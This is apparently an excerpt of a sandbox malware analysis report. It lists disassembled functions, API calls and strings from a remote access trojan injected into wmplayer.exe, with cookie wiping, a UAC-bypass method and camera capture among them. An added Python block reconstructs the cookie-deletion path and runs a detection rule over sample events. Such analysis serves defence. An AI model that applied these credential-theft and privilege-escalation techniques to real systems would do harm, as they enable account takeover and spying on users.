                                                                                            • API String ID: 3114080316-344394840
                                                                                            • Opcode ID: c3719a5ed271eeb77feb060549d62eb8684634a1434435233477e5bb1b94a9bb
                                                                                            • Instruction ID: 92049c6ae7fba3f13a57cd60a3827c89810429dfa6cf24b756c0ab1f01d338b1
                                                                                            • Opcode Fuzzy Hash: c3719a5ed271eeb77feb060549d62eb8684634a1434435233477e5bb1b94a9bb
                                                                                            • Instruction Fuzzy Hash: 0141A2316042009BC224F635D9A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
                                                                                            APIs
                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00437AAB
                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AB3
                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00437B41
                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B6C
                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00437BC1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                            • String ID: csm
                                                                                            • API String ID: 1170836740-1018135373
                                                                                            • Opcode ID: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                                            • Instruction ID: 9404c61c081bc4e6da2099be8a52027e1297fde76841380def533d3eaa533744
                                                                                            • Opcode Fuzzy Hash: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                                            • Instruction Fuzzy Hash: CD410970A04209DBCF20EF19C844A9FBBB5AF0932CF14915BE8556B392D739EE05CB95
                                                                                            APIs
                                                                                            • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                                                                            • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                                                                            • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                            • String ID: csm
                                                                                            • API String ID: 1170836740-1018135373
                                                                                            • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                            • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                                                                            • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                                                            • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                                                                                            APIs
                                                                                              • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                              • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                              • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                            • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                                                                                            • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                            • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                            • API String ID: 1133728706-4073444585
                                                                                            • Opcode ID: d82bb59f73ba21d1adf7e088d37ed553899b51bd2532a140866917cd763e441d
                                                                                            • Instruction ID: d844a8c095f6bc09782a4352348c5dfd082864f820bca84d12e352ec49be167e
                                                                                            • Opcode Fuzzy Hash: d82bb59f73ba21d1adf7e088d37ed553899b51bd2532a140866917cd763e441d
                                                                                            • Instruction Fuzzy Hash: 5F216D71A00109A6CB04F7B2DCA69EE7764AE95318F40013FE902771D2EB7C9A49C6DE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ac8429af2de8aec4c7be5426e4bb47fdde12a831901fd5511e93482c0d59407e
                                                                                            • Instruction ID: 969edc756a0dffe936139f0dc9bce31aed38431af2e56c5058bd22e5c2f4fad6
                                                                                            • Opcode Fuzzy Hash: ac8429af2de8aec4c7be5426e4bb47fdde12a831901fd5511e93482c0d59407e
                                                                                            • Instruction Fuzzy Hash: 991124B1508654FBDB202F769C4493B3B6CEF82376B10016FFC15D7242DA7C8805C2AA
                                                                                            APIs
                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
                                                                                            • int.LIBCPMT ref: 0040FC0F
                                                                                              • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                              • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                            • std::_Facet_Register.LIBCPMT ref: 0040FC4B
                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                            • String ID: P[G
                                                                                            • API String ID: 2536120697-571123470
                                                                                            • Opcode ID: 080c8d6f573d4b518caf4e655f0fcc3a1f7fca7e624085fd0a478c15266a48d0
                                                                                            • Instruction ID: a46b155a0a589d4ea75c4983af6a631921b9d9812a15003568faaf62f6f01cf1
                                                                                            • Opcode Fuzzy Hash: 080c8d6f573d4b518caf4e655f0fcc3a1f7fca7e624085fd0a478c15266a48d0
                                                                                            • Instruction Fuzzy Hash: 7611F331904518A7CB14FBA5D8469DEB7689E44358B20007BF905B72C1EB7CAE45C79D
                                                                                            APIs
                                                                                              • Part of subcall function 0044FA22: _free.LIBCMT ref: 0044FA4B
                                                                                            • _free.LIBCMT ref: 0044FD29
                                                                                              • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                            • _free.LIBCMT ref: 0044FD34
                                                                                            • _free.LIBCMT ref: 0044FD3F
                                                                                            • _free.LIBCMT ref: 0044FD93
                                                                                            • _free.LIBCMT ref: 0044FD9E
                                                                                            • _free.LIBCMT ref: 0044FDA9
                                                                                            • _free.LIBCMT ref: 0044FDB4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 776569668-0
                                                                                            • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                            • Instruction ID: b6f47af98b99390d2ca34363280ce03bc5e4d1be0f6c4f29549f69d6ae0d3a9a
                                                                                            • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                            • Instruction Fuzzy Hash: 5F119031711B04B6F520FBB2CC07FCBB7DC9F42308F814C2EB29E76152E628A9184645
                                                                                            APIs
                                                                                              • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                                                                            • _free.LIBCMT ref: 100092AB
                                                                                              • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                              • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                            • _free.LIBCMT ref: 100092B6
                                                                                            • _free.LIBCMT ref: 100092C1
                                                                                            • _free.LIBCMT ref: 10009315
                                                                                            • _free.LIBCMT ref: 10009320
                                                                                            • _free.LIBCMT ref: 1000932B
                                                                                            • _free.LIBCMT ref: 10009336
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 776569668-0
                                                                                            • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                            • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                                                                            • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                            • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                                                                                            APIs
                                                                                            • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Program Files (x86)\Windows Media Player\wmplayer.exe), ref: 00406835
                                                                                              • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                                                                                              • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                            • CoUninitialize.OLE32 ref: 0040688E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: InitializeObjectUninitialize_wcslen
                                                                                            • String ID: C:\Program Files (x86)\Windows Media Player\wmplayer.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                            • API String ID: 3851391207-2424989193
                                                                                            • Opcode ID: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                                            • Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
                                                                                            • Opcode Fuzzy Hash: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                                            • Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
                                                                                            APIs
                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
                                                                                            • int.LIBCPMT ref: 0040FEF2
                                                                                              • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                              • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                            • std::_Facet_Register.LIBCPMT ref: 0040FF2E
                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                            • String ID: H]G
                                                                                            • API String ID: 2536120697-1717957184
                                                                                            • Opcode ID: 4f42b0104d3fab8d9c54d588918312ac25f5cdf33bdc383dd9a32706d08bdfcf
                                                                                            • Instruction ID: c39742161ac3258eace465d30f2780732a1ff9819e97f4bd037edafe9ec39b9f
                                                                                            • Opcode Fuzzy Hash: 4f42b0104d3fab8d9c54d588918312ac25f5cdf33bdc383dd9a32706d08bdfcf
                                                                                            • Instruction Fuzzy Hash: 9011BF31900419ABCB24FBA5C8468DDB7799F95318B20007FF505B72C1EB78AF09C799
                                                                                            APIs
                                                                                            • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                                                                                            • GetLastError.KERNEL32 ref: 0040B2EE
                                                                                            Strings
                                                                                            • [Chrome Cookies found, cleared!], xrefs: 0040B314
                                                                                            • UserProfile, xrefs: 0040B2B4
                                                                                            • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                                                                                            • [Chrome Cookies not found], xrefs: 0040B308
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                             • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: DeleteErrorFileLast
                                                                                            • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                            • API String ID: 2018770650-304995407
                                                                                            • Opcode ID: ee578fe998e79df25f0549cf5f4ca79d5eb27d28ea68ce1bf511d2245c481035
                                                                                            • Instruction ID: 647c9f6895dd19beb09db90be4e639f81332b1b521455d1adc7a9c6a9ee315b4
                                                                                            • Opcode Fuzzy Hash: ee578fe998e79df25f0549cf5f4ca79d5eb27d28ea68ce1bf511d2245c481035
                                                                                            • Instruction Fuzzy Hash: 3301A23164410557CB047BB5DD6B8AF3624ED50708F60013FF802B32E2FE3A9A0586CE
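The entry above is the sample's Chrome cookie wiper: it expands the UserProfile environment variable (the report lists the string but not the call used to read it), appends the fixed `\AppData\Local\Google\Chrome\User Data\Default\Cookies` suffix, calls DeleteFileA, checks GetLastError and logs either `[Chrome Cookies found, cleared!]` or `[Chrome Cookies not found]`. A typical motive for wiping cookies is to force the victim to sign in again so the credentials pass through the keylogger. The Python below is an added example, not code from the Joe Sandbox report or from the sample: it reproduces the path construction and the two status strings, then runs a small detection over constructed Sysmon-style FileDelete records (Event IDs 23 and 26). The victim profile path, the event records and the use of the injected wmplayer.exe host (the process the snapshot files belong to) as the deleting image are assumptions for illustration. Current Chrome versions keep the database under `User Data\<profile>\Network\Cookies`, so the function only hits the legacy location; the rule matches both.

```python
import re

# Strings from the report's entry for this function: the environment variable it
# reads, the suffix it appends before DeleteFileA, and the two status messages.
USERPROFILE_VAR = "UserProfile"
COOKIE_SUFFIX = r"\AppData\Local\Google\Chrome\User Data\Default\Cookies"
LOG_CLEARED = "[Chrome Cookies found, cleared!]"
LOG_NOT_FOUND = "[Chrome Cookies not found]"


def cookie_target_path(environment: dict) -> str:
    """Build the path exactly as the function does: %UserProfile% + fixed suffix."""
    return environment[USERPROFILE_VAR] + COOKIE_SUFFIX


def remcos_log_line(delete_succeeded: bool) -> str:
    """Status string the function emits after DeleteFileA / GetLastError."""
    return LOG_CLEARED if delete_succeeded else LOG_NOT_FOUND


# Detection: a Chrome cookie database deleted by anything that is not Chrome itself.
# Matches the legacy Default\Cookies location this sample targets and the
# Network\Cookies location used by current Chrome builds.
CHROME_COOKIE_DB = re.compile(
    r"\\AppData\\Local\\Google\\Chrome\\User Data\\[^\\]+\\(?:Network\\)?Cookies$",
    re.IGNORECASE,
)
FILE_DELETE_EVENTS = {23, 26}  # Sysmon FileDelete and FileDeleteDetected


def is_chrome(image: str) -> bool:
    return image.lower().endswith("\\chrome.exe")


def find_cookie_db_deletions(events: list) -> list:
    """Return FileDelete events that remove a Chrome cookie DB from a non-Chrome process."""
    return [
        ev for ev in events
        if ev["EventID"] in FILE_DELETE_EVENTS
        and CHROME_COOKIE_DB.search(ev["TargetFilename"])
        and not is_chrome(ev["Image"])
    ]


# Constructed sample telemetry (assumptions: victim profile C:\Users\victim; the
# injected wmplayer.exe host from the report's snapshot names is the deleting process).
SAMPLE_EVENTS = [
    {"EventID": 23, "Image": r"C:\Program Files (x86)\Windows Media Player\wmplayer.exe",
     "TargetFilename": r"C:\Users\victim\AppData\Local\Google\Chrome\User Data\Default\Cookies"},
    {"EventID": 23, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "TargetFilename": r"C:\Users\victim\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies"},
    {"EventID": 23, "Image": r"C:\Program Files (x86)\Windows Media Player\wmplayer.exe",
     "TargetFilename": r"C:\Users\victim\AppData\Local\Temp\scratch.tmp"},
    {"EventID": 11, "Image": r"C:\Program Files (x86)\Windows Media Player\wmplayer.exe",
     "TargetFilename": r"C:\Users\victim\AppData\Local\Google\Chrome\User Data\Default\Cookies"},
]

if __name__ == "__main__":
    print(cookie_target_path({USERPROFILE_VAR: r"C:\Users\victim"}))
    for hit in find_cookie_db_deletions(SAMPLE_EVENTS):
        print("ALERT: Chrome cookie DB deleted by", hit["Image"])
```

Only the first constructed record fires: the Chrome-initiated deletion of `Network\Cookies` is routine database maintenance, the Temp file is unrelated, and the last record is a file-create event (ID 11), not a delete.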
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: C:\Program Files (x86)\Windows Media Player\wmplayer.exe$Rmc-MKYDDH$BG
                                                                                            • API String ID: 0-289134326
                                                                                            • Opcode ID: b7a2e59ac2a9b4cfd69ae58ffa53ef09c4b6135ca76893af750d01e39a00b3fe
                                                                                            • Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
                                                                                            • Opcode Fuzzy Hash: b7a2e59ac2a9b4cfd69ae58ffa53ef09c4b6135ca76893af750d01e39a00b3fe
                                                                                            • Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C
                                                                                            APIs
                                                                                            • __allrem.LIBCMT ref: 00439789
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397A5
                                                                                            • __allrem.LIBCMT ref: 004397BC
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397DA
                                                                                            • __allrem.LIBCMT ref: 004397F1
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043980F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                            • String ID:
                                                                                            • API String ID: 1992179935-0
                                                                                            • Opcode ID: 088a2e1066119da7e611ebb0c50ba568729b81e5e50e163a33f94ab824c18df8
                                                                                            • Instruction ID: 29148231e9435c1f59b8c02308e8e4f0c882d016d38a0f6ab7871d26eba04b65
                                                                                            • Opcode Fuzzy Hash: 088a2e1066119da7e611ebb0c50ba568729b81e5e50e163a33f94ab824c18df8
                                                                                            • Instruction Fuzzy Hash: 7A811B726017069BE724AE79CC82B6F73A8AF49328F24512FF511D66C1E7B8DD018B58
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                                                                            • __freea.LIBCMT ref: 10008A08
                                                                                              • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                            • __freea.LIBCMT ref: 10008A11
                                                                                            • __freea.LIBCMT ref: 10008A36
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                            • String ID:
                                                                                            • API String ID: 1414292761-0
                                                                                            • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                            • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                                                                            • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                            • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: __cftoe
                                                                                            • String ID:
                                                                                            • API String ID: 4189289331-0
                                                                                            • Opcode ID: 69df1f9648de409375186bf4c737c9597d71512c260aa95240f454dab3e526b7
                                                                                            • Instruction ID: 646e0444ce84107b4b6d0ff1d92098e8eb0dfa86acef9ec08128487301265115
                                                                                            • Opcode Fuzzy Hash: 69df1f9648de409375186bf4c737c9597d71512c260aa95240f454dab3e526b7
                                                                                            • Instruction Fuzzy Hash: A851FC72900105ABFB249F598C81F6F77A9EFC9324F15421FF815A6281DB3DDD01866D
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: __freea$__alloca_probe_16
                                                                                            • String ID: a/p$am/pm
                                                                                            • API String ID: 3509577899-3206640213
                                                                                            • Opcode ID: d47145a3bc1b7d9653af932916ed6ede224238620767b4a39004040ccf91a16a
                                                                                            • Instruction ID: cf09b504ad0dd49156c227457699755419044adef71e8be36bbdd309731302d4
                                                                                            • Opcode Fuzzy Hash: d47145a3bc1b7d9653af932916ed6ede224238620767b4a39004040ccf91a16a
                                                                                            • Instruction Fuzzy Hash: 5FD1F271A00206EAFB249F68D945ABBB7B0FF06300F26415BE905AB749D37D8D41CB5B
                                                                                            APIs
                                                                                            • Sleep.KERNEL32(00000000), ref: 00403E8A
                                                                                              • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prologSleep
                                                                                            • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
                                                                                            • API String ID: 3469354165-462540288
                                                                                            • Opcode ID: 749b719005d2056865057d93797d2a330aa37569de42fbc52bb63ba102851032
                                                                                            • Instruction ID: 0dce3c58988623f436d5c5d916b021fc345e3c2d86dff9f08dc17926b78fee06
                                                                                            • Opcode Fuzzy Hash: 749b719005d2056865057d93797d2a330aa37569de42fbc52bb63ba102851032
                                                                                            • Instruction Fuzzy Hash: A441A330A0420197CA14FB79C816AAD3A655B45704F00453FF809A73E2EF7C9A45C7CF
                                                                                            APIs
